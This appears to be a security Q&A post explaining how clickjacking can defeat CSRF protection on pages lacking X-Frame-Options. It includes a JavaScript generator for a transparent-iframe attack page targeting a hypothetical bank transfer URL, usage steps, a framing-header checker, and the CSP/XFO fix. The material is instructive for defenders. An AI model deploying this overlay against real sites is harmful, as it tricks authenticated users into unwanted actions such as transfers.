Question

Is it possible to execute CSRF through clickjacking vulnerability?

Suppose my website is fully protected from CSRF attacks but there is no XFO. Is there any way to exploit CSRF through a clickjacking vulnerability?

I heard that XMLHttpRequest can be used to execute CSRF if there is no XFO but there is CSRF protection, so any ideas?


Solution

Yes, if there is no X-Frame-Options response header present, an attacker can frame your page and make it transparent, so when the victim tries to click the button on the attacker's site (e.g. "Click here to win an iPad") they are in fact interacting with your page (e.g. "Click here to Initiate Bank Transfer").

This relies on the victim being already authenticated with the target site, and also relies on there being a one-click action available on the site. If there is a form to fill in that cannot be pre-filled by the use of parameters, then this particular attack is not possible without tricking the victim into completing these somehow. This makes clickjacking more of a risk for parameterless forms, or when only hidden inputs or JavaScript variables are used.

See OWASP's pages on Clickjacking and Testing for Clickjacking for more information.
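The overlay the answer describes, as an added example that is not part of the original question or answer: a generator for the attacker's page (transparent iframe stacked over a decoy button), the offset calculation that puts the target's real button under the decoy, and a check of the target's response headers that decides whether a browser would frame the page at all. The hostnames `bank.example`, `attacker.example` and `partner.example`, the `/transfer` path and its query parameters, and the button coordinates are all hypothetical; the header evaluation uses an exact-origin match for CSP sources rather than the full source-expression matching real browsers perform.

```javascript
// Added example, not code from the original post. Hypothetical one-click
// target: the transfer form is pre-filled through query parameters, which is
// what makes a single framed click sufficient (the caveat in the answer).
const TARGET_URL = "https://bank.example/transfer?to=attacker&amount=1000";

// Where the decoy button sits on the attacker's page (CSS pixels).
const DECOY = { x: 100, y: 100 };

// Escape a string for use inside an HTML attribute value.
function attr(s) {
  return s.replace(/&/g, "&amp;").replace(/"/g, "&quot;").replace(/</g, "&lt;");
}

// Shift the iframe so that the target's real button (at buttonPos inside the
// framed page, measured by the attacker in their own browser) lands exactly
// on top of the decoy button.
function iframeOffset(buttonPos) {
  return { top: DECOY.y - buttonPos.y, left: DECOY.x - buttonPos.x };
}

// Build the attacker's page: the victim sees only the decoy; the framed
// target is stacked above it and fully transparent, so the click reaches
// the target's button with the victim's existing session cookies.
function buildClickjackPage(targetUrl, buttonPos) {
  const o = iframeOffset(buttonPos);
  return `<!doctype html>
<html><head><meta charset="utf-8"><style>
  #decoy  { position:absolute; top:${DECOY.y}px; left:${DECOY.x}px; z-index:1; }
  #target { position:absolute; top:${o.top}px; left:${o.left}px;
            width:1200px; height:900px; border:0; opacity:0; z-index:2; }
</style></head><body>
  <button id="decoy">Click here to win an iPad</button>
  <iframe id="target" src="${attr(targetUrl)}"></iframe>
</body></html>`;
}

// Decide whether framerOrigin may embed a page from targetOrigin, given the
// target's response headers. Content-Security-Policy frame-ancestors takes
// precedence over X-Frame-Options when both are present; the obsolete
// ALLOW-FROM value is ignored by current browsers and so treated as absent.
// Simplification: CSP sources are compared as exact origins.
function framingAllowed(headers, framerOrigin, targetOrigin) {
  const get = (name) =>
    Object.entries(headers).find(([k]) => k.toLowerCase() === name)?.[1];
  const csp = get("content-security-policy");
  if (csp) {
    const directive = csp.split(";").map((s) => s.trim())
      .find((s) => s.toLowerCase().startsWith("frame-ancestors"));
    if (directive) {
      const sources = directive.split(/\s+/).slice(1)
        .map((s) => s.replace(/^'|'$/g, "").toLowerCase());
      if (sources.includes("none")) return false;
      if (sources.includes("*")) return true;
      if (sources.includes("self") && framerOrigin === targetOrigin) return true;
      return sources.includes(framerOrigin.toLowerCase());
    }
  }
  const xfo = get("x-frame-options");
  if (xfo) {
    const v = xfo.trim().toUpperCase();
    if (v === "DENY") return false;
    if (v === "SAMEORIGIN") return framerOrigin === targetOrigin;
  }
  return true; // no restriction: any origin may frame the page
}

// Demonstration with constructed header sets: the situation in the question
// (CSRF tokens but no XFO) versus a hardened response.
const noFramingHeaders = {};
const hardened = { "Content-Security-Policy": "frame-ancestors 'none'",
                   "X-Frame-Options": "DENY" };
console.log("framable without XFO/CSP:",
  framingAllowed(noFramingHeaders, "https://attacker.example", "https://bank.example"));
console.log("framable when hardened:",
  framingAllowed(hardened, "https://attacker.example", "https://bank.example"));
```

To try the overlay, write the output of `buildClickjackPage(TARGET_URL, { x: 300, y: 450 })` to a file and open it while logged in to a test site that sends neither header; the CSRF token is irrelevant because the framed page itself submits the form with the token it was served. Setting `opacity` to `0.3` while developing makes the alignment visible. The fix is to send `Content-Security-Policy: frame-ancestors 'none'` (or a list of permitted origins) together with `X-Frame-Options: DENY` for older browsers, which `framingAllowed` models.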

Licensed under: CC-BY-SA with attribution